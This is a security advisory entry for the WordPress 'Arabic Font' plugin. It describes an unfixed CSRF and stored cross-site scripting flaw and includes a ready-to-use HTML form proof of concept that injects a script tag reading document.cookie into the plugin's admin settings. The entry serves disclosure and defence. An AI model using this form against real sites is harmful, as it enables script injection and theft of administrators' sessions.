WordPress Plugin Vulnerabilities

Arabic Font - CSRF & Stored XSS

Description

Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">  
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab"><script>alert(document.cookie)</script><input+type="hidden"+value="">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>

Affects Plugins

Plugin icon
arabic-font
No known fix

References

URL
https://rastating.github.io/arabic-font-1-2-csrf-stored-xss

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Submitter
rastating
Submitter website
https://www.rastating.com/
Submitter twitter
@iamrastating
Verified
No
WPVDB ID
9701aab5-df17-48bb-aa4e-b47fb09321fc

Timeline

Publicly Published
2017-07-20 (about 6 years ago)
Added
2017-07-21 (about 6 years ago)
Last Updated
2019-11-01 (about 4 years ago)

Other

Published
Title
Published
2021-08-23
Title
Limit Login Attempts < 4.0.50 - Unauthenticated Stored Cross-Site Scripting
Published
2021-04-21
Title
Accordion < 2.2.30 - Authenticated Reflected Cross-Site Scripting (XSS)
Published
2020-02-25
Title
Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2014-05-28
Title
Rezgo Online Booking < 1.8.2 - Multiple XSS
Published
2023-10-25
Title
Download CloudNet360 <= 3.2.0 - Reflected Cross-Site Scripting